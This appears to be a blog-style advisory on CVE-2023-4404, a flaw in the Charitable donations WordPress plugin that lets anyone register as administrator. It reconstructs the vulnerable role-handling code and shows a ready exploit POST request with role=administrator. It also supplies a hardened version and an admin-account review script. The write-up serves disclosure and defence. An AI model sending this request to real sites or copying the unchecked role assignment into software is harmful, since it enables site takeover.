CVE-2023-4404 - Privilege Escalation in the Donation Forms by Charitable Plugin for WordPress (up to v1.7.0.12): Analysis and Exploit Guide

CVE-2023-4404, disclosed in August 2023, is a critical vulnerability in the Donation Forms by Charitable WordPress plugin, affecting all versions up to and including 1.7.0.12. It lets an unauthenticated attacker register an account with any WordPress role, including administrator, simply by adding a role parameter to the plugin's registration POST request.

This post explains how the flaw works, shows what an exploit request looks like, and points you to the original references.

What is CVE-2023-4404?

The Donation Forms by Charitable plugin makes it easy to accept donations on a WordPress site. In vulnerable versions, however, its update_core_user function did not restrict which role a new account could be given during registration.

Normally a visitor who registers through a donation form gets a low-privilege donor account. In vulnerable versions the role written to the new account was taken straight from the request, so anyone could register as an administrator (or any other role) by adding a role parameter to the registration request.

Vulnerable Code Snippet

Below is a simplified reconstruction (not the plugin's literal source) of the role-handling part of the update_core_user function in vulnerable versions:

<?php
// Simplified reconstruction of update_core_user() in vulnerable versions.
// $user_args is built from the submitted form, so 'role' is attacker-controlled.
function update_core_user( $user_id, $user_args ) {
    // No capability check on the acting user before changing the role.
    if ( isset( $user_args['role'] ) ) {
        wp_update_user( array(
            'ID'   => $user_id,
            'role' => $user_args['role'],
        ) );
    }
}

> Problem: the role comes straight from the submitted form and is handed to wp_update_user() without any check that the acting user may assign roles (WordPress core gates role changes behind the promote_users capability). During self-registration the acting user is an anonymous visitor, so role=administrator is accepted as-is.
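The same logic next to a hardened counterpart, as an added example written for this post. It is not the plugin's source and not the vendor's actual patch; the function names charitable_role_to_apply, update_core_user_vulnerable and update_core_user_hardened and the sample role list are assumptions. The decision is isolated in a pure function so the file runs with plain `php` outside WordPress; the WordPress calls are only reached inside WordPress.

```php
<?php
// Added example, not the plugin's own code and not the vendor's patch: the
// role-handling part of update_core_user() in its vulnerable shape beside a
// hardened shape. The WordPress functions (current_user_can, wp_roles,
// wp_update_user) are only called inside the WP-aware wrappers; the decision
// itself is a pure function that runs anywhere.

/**
 * Decide whether a role supplied with a registration/profile request may be
 * applied. Returns the validated role slug, or null meaning "leave the role
 * alone" (a new account then keeps whatever wp_insert_user() gave it, i.e. the
 * site's default role).
 *
 * @param string|null $requested_role    Role taken from the request (untrusted).
 * @param bool        $actor_can_promote Whether the user MAKING the request holds
 *                                       WordPress' promote_users capability.
 *                                       An anonymous visitor never does.
 * @param string[]    $valid_roles       Role slugs that exist on the site.
 * @return string|null
 */
function charitable_role_to_apply( $requested_role, $actor_can_promote, array $valid_roles ) {
    if ( null === $requested_role || '' === $requested_role ) {
        return null;
    }
    // The essence of the fix: the request does not get to pick a role unless
    // the acting user is allowed to change roles anyway.
    if ( ! $actor_can_promote ) {
        return null;
    }
    // Even for a privileged actor, reject values that are not real role slugs.
    if ( ! is_string( $requested_role ) || ! in_array( $requested_role, $valid_roles, true ) ) {
        return null;
    }
    return $requested_role;
}

// Vulnerable shape (as simplified in the post): the request decides the role.
function update_core_user_vulnerable( $user_id, array $user_args ) {
    if ( isset( $user_args['role'] ) ) {
        wp_update_user( array( 'ID' => $user_id, 'role' => $user_args['role'] ) );
    }
}

// Hardened shape: the role field is only honoured when charitable_role_to_apply()
// allows it; otherwise the update does not touch the role at all.
function update_core_user_hardened( $user_id, array $user_args ) {
    $update = array( 'ID' => $user_id );
    $role   = charitable_role_to_apply(
        isset( $user_args['role'] ) ? $user_args['role'] : null,
        current_user_can( 'promote_users' ),            // false for logged-out requests
        array_keys( wp_roles()->get_names() )          // roles that exist on this site
    );
    if ( null !== $role ) {
        $update['role'] = $role;
    }
    wp_update_user( $update );
}

// Stand-alone demonstration when run outside WordPress (WP defines ABSPATH).
if ( ! defined( 'ABSPATH' ) ) {
    $site_roles = array( 'administrator', 'editor', 'subscriber' ); // constructed sample
    $cases = array(
        // requested role, actor can promote?, description
        array( 'administrator', false, 'anonymous self-registration sending role=administrator' ),
        array( 'editor',        true,  'administrator editing a profile while logged in' ),
        array( 'superuser',     true,  'privileged actor, but the role slug does not exist' ),
        array( null,            false, 'ordinary registration with no role field' ),
    );
    foreach ( $cases as list( $role, $can, $what ) ) {
        $result = charitable_role_to_apply( $role, $can, $site_roles );
        printf( "%-58s => %s\n", $what, null === $result ? 'role untouched' : 'role set to ' . $result );
    }
}
```

Two points matter in the hardened version: the capability is evaluated for the user making the request, never for the account being created, and a disallowed role is dropped rather than "validated", so the update simply never carries a role key. In the vulnerable shape, `$user_args` is built from the posted form, which is why a hidden or extra field controls the outcome.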

Step-by-step: How Would an Attacker Exploit This?

Suppose a site runs Charitable Donation Forms v1.7.0.12 or earlier (before the fix shipped in 1.7.0.13).

Here is what such a malicious POST request might look like. The endpoint and field names are illustrative; take the real ones from the site's registration form. The point is the extra role parameter.

POST /?charitable_register_user=1 HTTP/1.1
Host: target-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

user_login=maliciousadmin&user_pass=password123&user_email=hacker@example.com&role=administrator

> Result: on a vulnerable version, the account maliciousadmin is created with the administrator role. The attacker logs in with the password they chose and has full control of the site.

Real-World Impact

Attackers can easily automate this process and create admin accounts on any unpatched site using this plugin. As administrators, they can install malicious plugins, deface the website, or steal sensitive information.

Fix and Patch

The vulnerability was fixed in version 1.7.0.13. The patched code checks the acting user's capabilities and ignores a role supplied during registration by a user who is not allowed to assign one.

If you use this plugin, update immediately to the latest version from WordPress.org, then review the site's administrator accounts for any you did not create.
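An offline review script for that second step, added here as an example (it is not part of the original post or of the plugin). It takes user rows in the shape of `wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json`; the rows below are constructed sample data, and the known-admin list, the review window and the function names are assumptions.

```php
<?php
// Added example, not part of the original post or of the plugin: an offline
// review of a WordPress user export after patching. The $users rows below are
// constructed sample data shaped like the output of
//   wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json
// On a real site, export the same fields and feed them in instead.

/** True when the installed plugin version is below the first fixed release. */
function charitable_is_vulnerable_version( $installed, $first_fixed = '1.7.0.13' ) {
    return version_compare( $installed, $first_fixed, '<' );
}

/**
 * Return administrator accounts that are either not on the list of admins you
 * know you created, or were registered on/after $window_start (for example the
 * day the plugin was installed, or the day a vulnerable version went live).
 */
function find_unexpected_admins( array $users, array $known_admin_logins, $window_start ) {
    $start    = strtotime( $window_start );
    $findings = array();
    foreach ( $users as $u ) {
        // wp-cli emits roles as a comma-separated string; accept an array too.
        $roles = is_array( $u['roles'] ) ? $u['roles'] : explode( ',', $u['roles'] );
        if ( ! in_array( 'administrator', $roles, true ) ) {
            continue;
        }
        $reasons = array();
        if ( ! in_array( $u['user_login'], $known_admin_logins, true ) ) {
            $reasons[] = 'login not in known-admin list';
        }
        if ( strtotime( $u['user_registered'] ) >= $start ) {
            $reasons[] = 'registered on/after ' . $window_start;
        }
        if ( $reasons ) {
            $findings[] = array(
                'ID'         => (int) $u['ID'],
                'user_login' => $u['user_login'],
                'user_email' => $u['user_email'],
                'reasons'    => $reasons,
            );
        }
    }
    return $findings;
}

// --- constructed sample input (not real accounts) ---
$users = array(
    array( 'ID' => 1,  'user_login' => 'siteowner',      'user_email' => 'owner@example.org',  'user_registered' => '2021-03-10 09:12:00', 'roles' => 'administrator' ),
    array( 'ID' => 57, 'user_login' => 'jane.donor',     'user_email' => 'jane@example.org',   'user_registered' => '2023-08-20 14:03:11', 'roles' => 'subscriber' ),
    array( 'ID' => 58, 'user_login' => 'maliciousadmin', 'user_email' => 'hacker@example.com', 'user_registered' => '2023-08-24 03:41:57', 'roles' => 'administrator' ),
);
$known_admins = array( 'siteowner' );   // assumption: the admins you created yourself
$window_start = '2023-08-01';           // assumption: start of the period to scrutinise

printf( "Plugin 1.7.0.12 vulnerable: %s\n", charitable_is_vulnerable_version( '1.7.0.12' ) ? 'yes' : 'no' );
printf( "Plugin 1.7.0.13 vulnerable: %s\n", charitable_is_vulnerable_version( '1.7.0.13' ) ? 'yes' : 'no' );

foreach ( find_unexpected_admins( $users, $known_admins, $window_start ) as $f ) {
    printf( "REVIEW user %d (%s <%s>): %s\n", $f['ID'], $f['user_login'], $f['user_email'], implode( '; ', $f['reasons'] ) );
}
```

Removing a flagged account is not the end of the job: an attacker who held administrator could have installed plugins or altered other accounts, so treat a hit as the start of an incident review rather than a clean-up task.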

References

- Wordfence Advisory
- WPScan Entry
- Plugin Changelog

Closing Thoughts

CVE-2023-4404 is a critical bug: an attacker with no account on the site at all could create an administrator account with a single request. If you run a WordPress site that accepts donations with Charitable, patch immediately and review your users, especially administrator accounts you do not recognise.

Stay safe, keep your plugins up-to-date, and watch for these privilege escalation pitfalls!

*This guide is for educational purposes only—do not use these methods against systems you do not own or have explicit permission to test.*

Timeline

Published on: 08/23/2023 02:15:00 UTC
Last modified on: 08/28/2023 20:46:00 UTC